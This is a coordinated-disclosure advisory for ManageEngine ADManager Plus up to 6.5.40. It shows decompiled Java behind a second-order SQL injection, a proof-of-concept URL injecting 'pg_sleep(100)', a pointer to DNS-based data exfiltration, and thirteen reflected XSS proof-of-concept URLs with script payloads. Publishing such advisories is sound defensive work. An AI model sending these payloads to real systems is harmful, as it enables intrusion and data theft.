1. ADVISORY INFORMATION ======================================== Title: ManagEnegine ADManager Plus <= 6.5.40 Multiple Vulnerabilities Application: ManagEnegine Admanager Remotely Exploitable: Yes Authentication Required: Yes Versions Affected: <= 6.5.40 Technology: Java Vendor URL: https://www.manageengine.com/products/ad-manager/ Identified Issues Types: Reflected XSS(s), Authenticated Second Order SQL Injection Author: Mehmet Ince Date of found: 08 Jan 2017 2. CREDIT ======================================== Those vulnerabilities was identified during internal penetration test by Mehmet INCE from PRODAFT / INVICTUS. 3. DETAILS ======================================== 3.1 Authenticated Second Order SQL Injection ----------------------------------------- AdventNetADSMClient.jar file contains DuplicateComputersListener class definition which is accessible with /Report.do enpoint. start function of DuplicateComputerLAdegstener class is as follow (Irrelevant part are omitted.) public void start(ArrayList attributeList, HttpServletRequest request, ReportBean bean) { try { ... OMITTED ... this.attrbId = request.getParameter("attrId"); this.tableName = request.getParameter("attrTabName"); this.attrbName = request.getParameter("attrbColName"); ... OMITTED ... } catch (Exception e) { e.printStackTrace(); } } It takes user input without validation and set it directly to the class variables such as tableName, attrbName. And then deriveData function are going to be called with class variables that under the adversary control during complatedAction function execution. public void completedAction() { if (this.updateDetails) { ... OMITTED ... deriveData(this.domainName, this.attrbId, this.attrbName, this.tableName); ... OMITTED ... } ... OMITTED ... } deriveData function definition is as follow. public void deriveData(String domainName, String attrbId, String attrbName, String tableName) { ArrayList list = new ArrayList(); RelationalAPI relationalAPI = RelationalAPI.getInstance(); Connection connection = null; try { TableDefinition tableDef = MetaDataUtil.getTableDefinitionByName(tableName); ColumnDefinition colDef = tableDef.getColumnDefinitionByName(attrbName); String dataType = colDef.getDataType(); String selctAttrbCol_defaultValue = "'-'"; if (!dataType.equals("CHAR")) { ... OMITTED ... } String query = "select " + tableName + "." + attrbName + "," + tableName + ".domain_name " + " from " + tableName + " inner join " + this.resultTableName + " on " + tableName + ".object_guid=" + this.resultTableName + ".object_guid where " + tableName + "." + attrbName + "!=" + selctAttrbCol_defaultValue + " and " + tableName + ".domain_name='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + tableName + "." + attrbName + "," + tableName + ".domain_name having count(*) > 1;"; if (!tableName.equalsIgnoreCase(this.baseTableName)) { String selctAttrbCol = tableName + "." + attrbName; String parentAttrbCol = this.baseTableName + ".domain_name"; String parentTable = this.baseTableName;String childTable = tableName; String parentJoinCol = this.baseTableName + ".object_guid"; String childJoinCol = tableName + ".object_guid"; String join = parentTable + " inner join " + childTable + " on " + parentJoinCol + " = " + childJoinCol + " inner join " + this.resultTableName + " on " + parentJoinCol + " = " + this.resultTableName + ".object_guid"; query = "select " + selctAttrbCol + "," + parentAttrbCol + " from " + join + " where " + selctAttrbCol + "!=" + selctAttrbCol_defaultValue + " and " + parentAttrbCol + "='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + selctAttrbCol + "," + parentAttrbCol + " having count(*) > 1;"; } ArrayList result = getResult(query, attrbName); ArrayList subList = new ArrayList(); if (result.size() > 0) { ... OMITTED ... } if (subList.size() > 0) { ... OMITTED ... } else { ... OMITTED ... } } catch (Exception e) { e.printStackTrace(); } } As you can see, database query built with user supplied variable without PDO/ORM. POC URL : http://12.0.0.136:8080/Report.do?methodToCall=generateReport&action=Generate&domains=DC=acme,DC=local&&attrId=3001&attrTabName=1;%20SELECT%20pg_sleep(100);%20--&attrbColName=COMPUTER_NAME&attrbDispName=Computer%20Name Vulnerable Parameters: attrTabName, attrbColName IMPORTANT NOTE: Since whole process are being called as background job, there is no way to successfully exploitation with Blind and/or Time Based techniques. Since this application mostly runs on Windows operating systems, it's possible to exfiltrate data with DNS queries.(http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281) 3.2 Reflected Cross-Site Scripting Issues ----------------------------------------- Issue #1 POC URL : http://12.0.0.136:8080/ObjectProperties.do?selectedTab=home&guid={0622C4EE-51D8-4381-A1D9-05B66F10BA16}&domainName=12422'%3balert(1)%2f%2f166dlgck5&selectedObjectTab=properties&reportProperties=objectProperties&objectClass=computer&adscsrf=3b59a7c2-4cf4-4f3c-95e4-bfe41f76717a Parameters: domainName Issue #2 POC URL: http://12.0.0.136:8080/DelegationAudit.do?methodToCall=finish&selectedTab=delegation&selectedTile=delegationAudit&action='"-->&init=true Vulnerable Parameters: action Issue #3 POC URL: http://12.0.0.136:8080/HDTTemplates.do?technicianId=1&domainName='"--> Vulnerable Parameters: domainName Issue #4 POC URL: http://12.0.0.136:8080/jsp/reports/ExportReport.jsp?reportList=true&reportId=43&waadAccId=/'onload='alert(9) Vulnerable Parameters: waadAccId Issue #5 POC URL: http://12.0.0.136:8080/MgmtAutomation.do?selectedTab=automation&selectedTile=mgmtAutomation&methodToCall=scheduledAutomationCreation&actionType='"--> Vulnerable Parameters: actionType Issue #6 POC URL: http://12.0.0.136:8080/ObjectProperties.do?guid={0262EDE4-B845-4E67-B926-BC89BC4DDCBF}&objectClass='"-->&domainName=acme.local&nodeClicked=DC=acme,DC=local&selectedObjectTab=properties&objectName=Builtin&adscsrf= Vulnerable Parameters: objectClass, domainName Issue #7 POC URL: http://12.0.0.136:8080/PopupInputSelection.do?methodToCall=selectContainer&domainName='"-->&isWorkFlow=false&id=input2014&container=CN=Users,DC=acme,DC=local Vulnerable Parameters: domainName, id, container Issue #8 POC URL: http://12.0.0.136:8080/Report.do?selectedTab=reports&methodToCall=report&init=true&reportTab='"-->&tileName=Compliance Reports Vulnerable Parameters: reportTab, tileName, categoryId, Issue #9 POC URL: http://12.0.0.136:8080/AdvancedFilter.do?beanName=ReportBean&domainName='"-->&distinguishedName=DC=acme,DC=local Vulnerable Parameters: domainName, distinguishedName Issue #10 POC URL: http://12.0.0.136:8080/ViewSIDs.do?domainName='"-->&permissionType=folder Vulnerable Parameters: permissionType, domianName Issue #11 POC URL: http://12.0.0.136:8080/computerList.do?defaultNamingContext=DC=acme,DC=local&textField='"--> Vulnerable Parameters: textField Issue #12 POC URL: http://12.0.0.136:8080/ViewObjects.do?defaultNamingContext=x'" onmouseover=alert(9) &modelName=TreeModel&showDomains=false Vulnerable Parameters: defaultNamingContext,modelName, showDomain Issue #13 POC URL: http://12.0.0.136:8080/groupList.do?defaultNamingContext=DC=acme,DC=local&modifyType='"-->&beanName=undefined&type=single Vulnerable Parameters: modifyType, beanName 4. TIMELINE ======================================== 06 Jan 2017 - Netsparker identified several XSS vulnerabilities. 07 Jan 2017 - Further investigation done by INVICTUS/PRODAFT team. 07 Jan 2017 - SQL Injection identified by INVICTUS/PRODAFT team. 08 Jan 2017 - Details and short term mitigations are shared with members of GPACT/USTA platforms. 09 Jan 2017 - Vendor notified. 09 Jan 2017 - Vendor acknowledge the report. 13 Jan 2017 - Vendor replied with patch. 13 Jan 2017 - Patch verified by INVICTUS/PRODAFT team. 16 Jan 2017 - Advisory released (https://www.manageengine.com/products/ad-manager/release-notes.html)